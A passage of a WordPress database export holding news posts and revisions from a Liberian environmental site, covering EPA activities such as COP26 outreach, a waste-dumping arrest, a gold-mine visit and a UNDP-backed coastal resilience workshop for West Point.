href=\"https://ekmsliberia.info/wp-content/uploads/2021/12/ToR-Policy-Assessment_FINAL_VERSION.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','REQUEST FOR EXPRESSION OF INTEREST - Assessing Sustainable Development Impacts of Climate Policies','','inherit','closed','closed','','4510-revision-v1','','','2021-12-06 20:58:00','2021-12-06 20:58:00','',4510,'https://ekmsliberia.info/?p=4512',0,'revision','',0),(4514,42,'2021-11-05 10:49:00','2021-11-05 10:49:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) has embarked on a campaign to further amplify President George M. Weah\'s statement at COP 26. COP stands for conference of the parties and is an annual meeting of the 197 parties who have signed by up to the United Nations Framework Convention on Climate Change, an agreement aimed at preventing dangerous human interference with the climate system. President Weah told the gathering in Glasgow, Scotland that there is an inherent imbalance in the current architecture of climate financing. He said countries like Liberia, who maintain and protect the largest remaining tracts of forest reserves, receive the lowest benefits for these ecosystem services.As part of the campaign to further explain the president\'s message, technicians and environmental scientists including Deputy Director, Randall M. Dobayou and Daoda Socrate Carlon, Assistant Manager for ESIA made several radio and public appearances to discuss the president\'s statement in details. Hon. Dobayou was a guest at Ministry of Information regular press briefing on Wednesday, following his appearances at OK FM and LBS on Tuesday November 2, 2021. He also teamed up with Socrate Carlon at the Center for Intellectual Exchange on Carey to dismissed misinterpretations of the President\'s COP26\'s message. Yesterday\'s gathering attracted hundreds of young people who asked questions.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency (EPA) has embarked on a campaign to further amplify President George M. Weah\'s statement at COP 26.','','publish','open','open','','the-environmental-protection-agency-epa-has-embarked-on-a-campaign-to-further-amplify-president-george-m-weahs-statement-at-cop-26','','','2021-12-16 10:56:40','2021-12-16 10:56:40','',0,'https://ekmsliberia.info/?p=4514',148,'post','',0),(4515,42,'2021-12-16 10:55:19','2021-12-16 10:55:19','','epa','','inherit','open','closed','','epa-6','','','2021-12-16 10:55:19','2021-12-16 10:55:19','',4514,'https://ekmsliberia.info/wp-content/uploads/2021/12/epa.png',0,'attachment','image/png',0),(4516,42,'2021-12-16 10:56:38','2021-12-16 10:56:38','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) has embarked on a campaign to further amplify President George M. Weah\'s statement at COP 26. COP stands for conference of the parties and is an annual meeting of the 197 parties who have signed by up to the United Nations Framework Convention on Climate Change, an agreement aimed at preventing dangerous human interference with the climate system. President Weah told the gathering in Glasgow, Scotland that there is an inherent imbalance in the current architecture of climate financing. He said countries like Liberia, who maintain and protect the largest remaining tracts of forest reserves, receive the lowest benefits for these ecosystem services.As part of the campaign to further explain the president\'s message, technicians and environmental scientists including Deputy Director, Randall M. Dobayou and Daoda Socrate Carlon, Assistant Manager for ESIA made several radio and public appearances to discuss the president\'s statement in details. Hon. Dobayou was a guest at Ministry of Information regular press briefing on Wednesday, following his appearances at OK FM and LBS on Tuesday November 2, 2021. He also teamed up with Socrate Carlon at the Center for Intellectual Exchange on Carey to dismissed misinterpretations of the President\'s COP26\'s message. Yesterday\'s gathering attracted hundreds of young people who asked questions.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency (EPA) has embarked on a campaign to further amplify President George M. Weah\'s statement at COP 26.','','inherit','closed','closed','','4514-revision-v1','','','2021-12-16 10:56:38','2021-12-16 10:56:38','',4514,'https://ekmsliberia.info/?p=4516',0,'revision','',0),(4517,42,'2021-11-16 17:02:00','2021-11-16 17:02:00','<!-- wp:paragraph -->\n<p>Amidst efforts by the city government to give Monrovia and it\'s environs a facelift, some unscrupulous individuals are in the constant habit of illegally dumping waste randomly across the city. One of such persons was apprehended today, 19 November 2021 by a team of environmental inspectors and scientists under the leadership of Manager John K. Jallah, while dumping a pickup load of solid waste illegally along the Fendell-Bensonville route.The culprit was made to cleaned up the garbage and return it to the garbage disposal site. Illegal dumping of waste poses serious threats to human health. Kudos to Manager Jallah and his team.</p>\n<!-- /wp:paragraph -->','Man Arrested by a Team of EPA Inspectors Led by John K. Jallah While Dumping Waste Along the Fendell-Bensonville Road','','publish','closed','closed','','man-arrested-by-a-team-of-epa-inspectors-led-by-john-k-jallah-while-dumping-waste-along-the-fendell-bensonville-road','','','2021-12-16 11:08:37','2021-12-16 11:08:37','',0,'https://ekmsliberia.info/?p=4517',147,'post','',0),(4518,42,'2021-12-16 11:06:58','2021-12-16 11:06:58','','waste','','inherit','open','closed','','waste-2','','','2021-12-16 11:06:58','2021-12-16 11:06:58','',4517,'https://ekmsliberia.info/wp-content/uploads/2021/12/waste.png',0,'attachment','image/png',0),(4519,42,'2021-12-16 11:08:35','2021-12-16 11:08:35','<!-- wp:paragraph -->\n<p>Amidst efforts by the city government to give Monrovia and it\'s environs a facelift, some unscrupulous individuals are in the constant habit of illegally dumping waste randomly across the city. One of such persons was apprehended today, 19 November 2021 by a team of environmental inspectors and scientists under the leadership of Manager John K. Jallah, while dumping a pickup load of solid waste illegally along the Fendell-Bensonville route.The culprit was made to cleaned up the garbage and return it to the garbage disposal site. Illegal dumping of waste poses serious threats to human health. Kudos to Manager Jallah and his team.</p>\n<!-- /wp:paragraph -->','Man Arrested by a Team of EPA Inspectors Led by John K. Jallah While Dumping Waste Along the Fendell-Bensonville Road','','inherit','closed','closed','','4517-revision-v1','','','2021-12-16 11:08:35','2021-12-16 11:08:35','',4517,'https://ekmsliberia.info/?p=4519',0,'revision','',0),(4520,42,'2021-11-16 15:08:00','2021-11-16 15:08:00','<!-- wp:paragraph -->\n<p>The Executive Director and CEO of the EPA, Prof. Wilson K. Tarpeh on Thursday 25 November 2021 paid a visit to Bea Mountain Mining Cooperation at New Liberty Gold Mine in Grand Cape Mount County.The visit is part of Prof. Tarpeh\'s commitment to keep proponents in compliance with the Environmental Protection and Management Law of Liberia. The visit also provided the EPA CEO a practical understanding of the working of BMMC mining operations. It was also intended to boost the confidence of concessionaire. He called on BMMC Management to take due care to environmental sustainability and protection of the likelihood of communities near it concession area.</p>\n<!-- /wp:paragraph -->','Executive Director of EPA Visits Bea Mountain Mining Cooperation at New Liberty Gold Mine in Grand Cape Mount County','','publish','open','open','','executive-director-of-epa-visits-bea-mountain-mining-cooperation-at-new-liberty-gold-mine-in-grand-cape-mount-county','','','2021-12-16 12:33:37','2021-12-16 12:33:37','',0,'https://ekmsliberia.info/?p=4520',146,'post','',0),(4521,42,'2021-12-16 12:31:46','2021-12-16 12:31:46','','bea mountain','','inherit','open','closed','','bea-mountain','','','2021-12-16 12:31:46','2021-12-16 12:31:46','',4520,'https://ekmsliberia.info/wp-content/uploads/2021/12/bea-mountain.png',0,'attachment','image/png',0),(4522,42,'2021-12-16 12:33:34','2021-12-16 12:33:34','<!-- wp:paragraph -->\n<p>The Executive Director and CEO of the EPA, Prof. Wilson K. Tarpeh on Thursday 25 November 2021 paid a visit to Bea Mountain Mining Cooperation at New Liberty Gold Mine in Grand Cape Mount County.The visit is part of Prof. Tarpeh\'s commitment to keep proponents in compliance with the Environmental Protection and Management Law of Liberia. The visit also provided the EPA CEO a practical understanding of the working of BMMC mining operations. It was also intended to boost the confidence of concessionaire. He called on BMMC Management to take due care to environmental sustainability and protection of the likelihood of communities near it concession area.</p>\n<!-- /wp:paragraph -->','Executive Director of EPA Visits Bea Mountain Mining Cooperation at New Liberty Gold Mine in Grand Cape Mount County','','inherit','closed','closed','','4520-revision-v1','','','2021-12-16 12:33:34','2021-12-16 12:33:34','',4520,'https://ekmsliberia.info/?p=4522',0,'revision','',0),(4524,42,'2021-12-09 15:08:00','2021-12-09 15:08:00','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) on Thursday, 9<sup>th</sup> December 2021 held a one-day inception workshop for the Monrovia Metropolitan Climate Resilience Project (MMCRP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>MMCRP seeks to address one of Monrovia’s most urgent adaptation needs by constructing a rock revetment to protect West Point against coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inception meeting was intended to inform stakeholders and partners about the commencement of the project and activities to be undertaken, deliverable and outcomes to be met and progress made thus far, Zienu Kanneh, MMCRP Coordinator said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kanneh disclosed that it was also intended to highlight the roles and responsibilities of the project management unit and implementing institutions.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In May 2021, the Green Climate Fund (GCF) approved US$17.2 million in grant funding for the construction of a coastal defense wall to protect the Monrovia Metropolitan area from coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Government of Liberia is providing US$6.8 million in co-financing while UNDP Country Office is also providing $US1.5 million to buttress the GCF funding for the MMCRP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project is expected to benefit approximately 250,000 vulnerable people living in the Monrovia Metropolitan Area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MMCRP also aims to address barriers to effective climate change adaptation in the coastal zone of Monrovia, and its environs including other parts of the country, with a focus on three inter-related interventions including coastal protection; coastal management; and diversified climate-resilient.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The project comes amidst increased vulnerability of the coastal zones of Liberia to the climate change impacts of sea-level rise (SLR) and the increasing frequency of high-intensity storms, both of which contribute to coastal erosion and shoreline retreat.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":4525,\"width\":533,\"height\":609,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Prof.-Tarpeh-896x1024.jpg\" alt=\"\" class=\"wp-image-4525\" width=\"533\" height=\"609\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><em><u>Prof. Wilson K. Tarpeh, CEO and Executive Director of EPA Speaking at the workshop</u></em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the inception workshop, EPA Executive Director and Chief Executive Officer (CEO), Prof. Wilson K Tarpeh said it had been barely six years since the EPA embarked on the development of a project concept idea about saving the township of West Point due to coastal erosion.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He furthered that the idea came about after the completion of Liberia’s National Adaption Plan (NAP) program actions in 2006, which identified West Point as one of the highly vulnerable shorelines in Monrovia in relations to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The shoreline of West Point was identified as one of the vulnerable land areas within Monrovia that needs urgent and adaptable action to avoid the washing away of the area, which will amount to the loss of lives, destruction of dwelling homes, destruction of strategic infrastructures for example the Liberia Electricity Corporation (LEC)&nbsp;that houses electrical transmission and distribution equipment that serves the Township of West Point and other parts of Monrovia,” the EPA boss noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After several back and forth negotiations with the Green Climate Fund, Prof. Tarpeh revealed that the Board of Fund approved a grant, something he said was made possible through the support of President George Manneh Weah, Ministries of Finance, Public Works, Mines and Energy and the UNDP, West Point dwellers amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Dorsla Farcarthy, UNDP Team Leader lauded theGovernment of Liberia, under the administration of President George M. Weah, for Liberia’s successful and meaningful participation in the just ended COP 26 in Glasgow, which according to him further demonstrates Liberia’s commitment to the Paris agreement and global effort to address climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy stressed the need for following up and taking concrete actions on the outcomes of the COP 26 especially the issues around sustainable forest management (SFM).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, he said the essence of the inception workshop was to informed stakeholders and partners about the commencement of the project and activities to be undertaken, deliverables and outcomes to be met, and progress made thus far.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the 6-year project is so far the largest coastal resilient project funded in Liberia through the GCF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is an opportunity to draw upon the lessons learnt and build upon the success from implementation of other GCF and GEF funded projects and demonstrate the commitment and capacity of Liberia to successfully manage major donor projects that contributes toward climate action,” Mr. Farcarthy said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the project, which will be significantly implemented in West Point, an impoverished and densely populated informal settlement, is very important for the community considering the impacts of sea erosion on the population over the last 10 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Hence, we encourage a strong partnership with the community, development partners and the Government of Liberia and seek to enlist their full cooperation and support from this inception to full implementation of the project,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Mr. Farcarthy, there is a need to collectively work together to change the current approach to addressing the impacts of climate change from a focus on short-term solutions to long-term integrated and participatory planning that involves the public sector, private sector and communities at all levels of governance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Therefore this project is taking an integrated coastal zone management approach in its implementation,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy further stated that consistent with the approved project document and the Funding Activity Agreement, this project has three funding sources, with the highest amount, $17 million of grant coming from the Green Climate Fund. The remaining $8 million is supposed to come from the Government of Liberia and the UNDP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“While the disbursement of the first GCF grant of $523,932.00 has been fulfilled, the subsequent disbursements will depend on the commitments of the Government of Liberia and the UNDP to contribute their co-financing obligations,” he Farcarthy disclosed</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that UNDP stands ready to support Liberia in the implementation of the project, consistent with the Project Document and Funding Activity Agreement with the GCF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“To achieve the results of the project, UNDP will continue to strengthen its partnerships with Ministry of Finance &amp; Development Planning, Ministry of Mines &amp; Energy and Environmental Protection Agency and other government entities, beneficiary communities, civil society organizations (CSOs), Community Based organization and the Private Sector,” he indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Ladies and gentlemen, as we convene today for the inception of this very important project, I want to express my gratitude for the opportunity to work with you all in this process and look forward to a rewarding and successful impact of the project,”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy told participants drawn from line ministries, agencies and commissions of the Liberian Government.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, the senior environmental specialist of the World Bank in Liberia Shafick</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hoossein said coastal erosion is an issue that is faced worldwide and most importantly affects very venerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said as a partner of development to Liberia, his institution is also committed to assisting in climate change endeavors, saying the workshop was an important start of the greater scale of action in ensuring that vulnerable communities are saved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Montserrado County Electoral District # 7 Representative Solomon George lauded the Government of Liberia for initiating the project, which according to him will bring relief to his people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>West Point is situated in Electoral District # 7.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representative George also thanked UNDP and GCF for funding the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, William Weh, Commissioner of the Township of West Point thanked the Government of Liberia through the EPA for the project and pleaded for its immediate and speedy implementation to avoid more homes from being wash away by the ocean.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Commissioner Weh’s concern was immediately addressed by John C. L. Mayson, Technical Advisor on the MMRCP, who said that the project has already started and that local residents should expect seeing people in their communities. &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":4526,\"width\":647,\"height\":400,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Workshop-Participants-1024x635.jpg\" alt=\"\" class=\"wp-image-4526\" width=\"647\" height=\"400\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><em>Cross-section of participants at the workshop</em></p>\n<!-- /wp:paragraph -->','EPA & UNDP Hold Inception Workshop For GCF’s Largest Coastal Resilient Project','','publish','closed','closed','','epa-undp-hold-inception-workshop-for-gcfs-largest-coastal-resilient-project','','','2021-12-17 11:15:20','2021-12-17 11:15:20','',0,'https://ekmsliberia.info/?p=4524',145,'post','',0),(4525,42,'2021-12-17 11:12:37','2021-12-17 11:12:37','','Prof.-Tarpeh','','inherit','open','closed','','prof-tarpeh','','','2021-12-17 11:12:37','2021-12-17 11:12:37','',4524,'https://ekmsliberia.info/wp-content/uploads/2021/12/Prof.-Tarpeh.jpg',0,'attachment','image/jpeg',0),(4526,42,'2021-12-17 11:13:26','2021-12-17 11:13:26','','Workshop-Participants','','inherit','open','closed','','workshop-participants','','','2021-12-17 11:13:26','2021-12-17 11:13:26','',4524,'https://ekmsliberia.info/wp-content/uploads/2021/12/Workshop-Participants.jpg',0,'attachment','image/jpeg',0),(4527,42,'2021-12-17 11:14:25','2021-12-17 11:14:25','','workshop','','inherit','open','closed','','workshop','','','2021-12-17 11:14:25','2021-12-17 11:14:25','',4524,'https://ekmsliberia.info/wp-content/uploads/2021/12/workshop.png',0,'attachment','image/png',0),(4528,42,'2021-12-17 11:15:17','2021-12-17 11:15:17','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) on Thursday, 9<sup>th</sup> December 2021 held a one-day inception workshop for the Monrovia Metropolitan Climate Resilience Project (MMCRP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>MMCRP seeks to address one of Monrovia’s most urgent adaptation needs by constructing a rock revetment to protect West Point against coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inception meeting was intended to inform stakeholders and partners about the commencement of the project and activities to be undertaken, deliverable and outcomes to be met and progress made thus far, Zienu Kanneh, MMCRP Coordinator said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kanneh disclosed that it was also intended to highlight the roles and responsibilities of the project management unit and implementing institutions.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In May 2021, the Green Climate Fund (GCF) approved US$17.2 million in grant funding for the construction of a coastal defense wall to protect the Monrovia Metropolitan area from coastal erosion and storms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Government of Liberia is providing US$6.8 million in co-financing while UNDP Country Office is also providing $US1.5 million to buttress the GCF funding for the MMCRP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project is expected to benefit approximately 250,000 vulnerable people living in the Monrovia Metropolitan Area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The MMCRP also aims to address barriers to effective climate change adaptation in the coastal zone of Monrovia, and its environs including other parts of the country, with a focus on three inter-related interventions including coastal protection; coastal management; and diversified climate-resilient.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The project comes amidst increased vulnerability of the coastal zones of Liberia to the climate change impacts of sea-level rise (SLR) and the increasing frequency of high-intensity storms, both of which contribute to coastal erosion and shoreline retreat.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":4525,\"width\":533,\"height\":609,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Prof.-Tarpeh-896x1024.jpg\" alt=\"\" class=\"wp-image-4525\" width=\"533\" height=\"609\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><em><u>Prof. Wilson K. Tarpeh, CEO and Executive Director of EPA Speaking at the workshop</u></em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the inception workshop, EPA Executive Director and Chief Executive Officer (CEO), Prof. Wilson K Tarpeh said it had been barely six years since the EPA embarked on the development of a project concept idea about saving the township of West Point due to coastal erosion.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He furthered that the idea came about after the completion of Liberia’s National Adaption Plan (NAP) program actions in 2006, which identified West Point as one of the highly vulnerable shorelines in Monrovia in relations to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The shoreline of West Point was identified as one of the vulnerable land areas within Monrovia that needs urgent and adaptable action to avoid the washing away of the area, which will amount to the loss of lives, destruction of dwelling homes, destruction of strategic infrastructures for example the Liberia Electricity Corporation (LEC)&nbsp;that houses electrical transmission and distribution equipment that serves the Township of West Point and other parts of Monrovia,” the EPA boss noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After several back and forth negotiations with the Green Climate Fund, Prof. Tarpeh revealed that the Board of Fund approved a grant, something he said was made possible through the support of President George Manneh Weah, Ministries of Finance, Public Works, Mines and Energy and the UNDP, West Point dwellers amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Dorsla Farcarthy, UNDP Team Leader lauded theGovernment of Liberia, under the administration of President George M. Weah, for Liberia’s successful and meaningful participation in the just ended COP 26 in Glasgow, which according to him further demonstrates Liberia’s commitment to the Paris agreement and global effort to address climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy stressed the need for following up and taking concrete actions on the outcomes of the COP 26 especially the issues around sustainable forest management (SFM).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, he said the essence of the inception workshop was to informed stakeholders and partners about the commencement of the project and activities to be undertaken, deliverables and outcomes to be met, and progress made thus far.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the 6-year project is so far the largest coastal resilient project funded in Liberia through the GCF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is an opportunity to draw upon the lessons learnt and build upon the success from implementation of other GCF and GEF funded projects and demonstrate the commitment and capacity of Liberia to successfully manage major donor projects that contributes toward climate action,” Mr. Farcarthy said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the project, which will be significantly implemented in West Point, an impoverished and densely populated informal settlement, is very important for the community considering the impacts of sea erosion on the population over the last 10 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Hence, we encourage a strong partnership with the community, development partners and the Government of Liberia and seek to enlist their full cooperation and support from this inception to full implementation of the project,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Mr. Farcarthy, there is a need to collectively work together to change the current approach to addressing the impacts of climate change from a focus on short-term solutions to long-term integrated and participatory planning that involves the public sector, private sector and communities at all levels of governance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Therefore this project is taking an integrated coastal zone management approach in its implementation,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy further stated that consistent with the approved project document and the Funding Activity Agreement, this project has three funding sources, with the highest amount, $17 million of grant coming from the Green Climate Fund. The remaining $8 million is supposed to come from the Government of Liberia and the UNDP.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“While the disbursement of the first GCF grant of $523,932.00 has been fulfilled, the subsequent disbursements will depend on the commitments of the Government of Liberia and the UNDP to contribute their co-financing obligations,” he Farcarthy disclosed</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that UNDP stands ready to support Liberia in the implementation of the project, consistent with the Project Document and Funding Activity Agreement with the GCF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“To achieve the results of the project, UNDP will continue to strengthen its partnerships with Ministry of Finance &amp; Development Planning, Ministry of Mines &amp; Energy and Environmental Protection Agency and other government entities, beneficiary communities, civil society organizations (CSOs), Community Based organization and the Private Sector,” he indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Ladies and gentlemen, as we convene today for the inception of this very important project, I want to express my gratitude for the opportunity to work with you all in this process and look forward to a rewarding and successful impact of the project,”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Farcarthy told participants drawn from line ministries, agencies and commissions of the Liberian Government.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, the senior environmental specialist of the World Bank in Liberia Shafick</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hoossein said coastal erosion is an issue that is faced worldwide and most importantly affects very venerable communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said as a partner of development to Liberia, his institution is also committed to assisting in climate change endeavors, saying the workshop was an important start of the greater scale of action in ensuring that vulnerable communities are saved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Montserrado County Electoral District # 7 Representative Solomon George lauded the Government of Liberia for initiating the project, which according to him will bring relief to his people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>West Point is situated in Electoral District # 7.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representative George also thanked UNDP and GCF for funding the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, William Weh, Commissioner of the Township of West Point thanked the Government of Liberia through the EPA for the project and pleaded for its immediate and speedy implementation to avoid more homes from being wash away by the ocean.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Commissioner Weh’s concern was immediately addressed by John C. L. Mayson, Technical Advisor on the MMRCP, who said that the project has already started and that local residents should expect seeing people in their communities. &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":4526,\"width\":647,\"height\":400,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Workshop-Participants-1024x635.jpg\" alt=\"\" class=\"wp-image-4526\" width=\"647\" height=\"400\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><em>Cross-section of participants at the workshop</em></p>\n<!-- /wp:paragraph -->','EPA & UNDP Hold Inception Workshop For GCF’s Largest Coastal Resilient Project','','inherit','closed','closed','','4524-revision-v1','','','2021-12-17 11:15:17','2021-12-17 11:15:17','',4524,'https://ekmsliberia.info/?p=4528',0,'revision','',0),(4529,42,'2021-12-09 11:17:00','2021-12-09 11:17:00','<!-- wp:image {\"id\":4530,\"width\":492,\"height\":377,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/12/Speaker-Chambers-Prof-Tarpeh-1024x787.jpg\" alt=\"\" class=\"wp-image-4530\" width=\"492\" height=\"377\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><em><u>Dr. Chambers chatting with Prof. Tarpeh at the ceremony</u></em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Speaker of the House of Representatives, Dr. Bhofal Chambers has disclosed that Liberia’s economy, population and environment are highly susceptible to climate change vulnerability and therefore called on every citizen to take actions and measures to promote adaptation to reduce climate change risk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the launch of Liberia’s National Adaptation Plan (NAP) Adaptation Communication (AdCom) on Wednesday 8 December 2021 at the Corina Hotel in Sinkor, Dr. Chambers said reduction of climate change risk requires stronger commitment and collaboration from all sectors at all stages.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s National Adaptation Plan is intended to help Liberia tackle the issue of climate change through a sound adaptation program that involves a whole of society approach to achieve the goal, vision and specific objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was developed through a consultative multi-stakeholder process and informed by sectoral climate vulnerability and risk assessments, and the disaster risk assessment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The NAP focuses on six sectors that are priorities of the Government of Liberia in its efforts to adapt to the impacts of climate change: agriculture, coastal zones, forestry, energy, waste management and 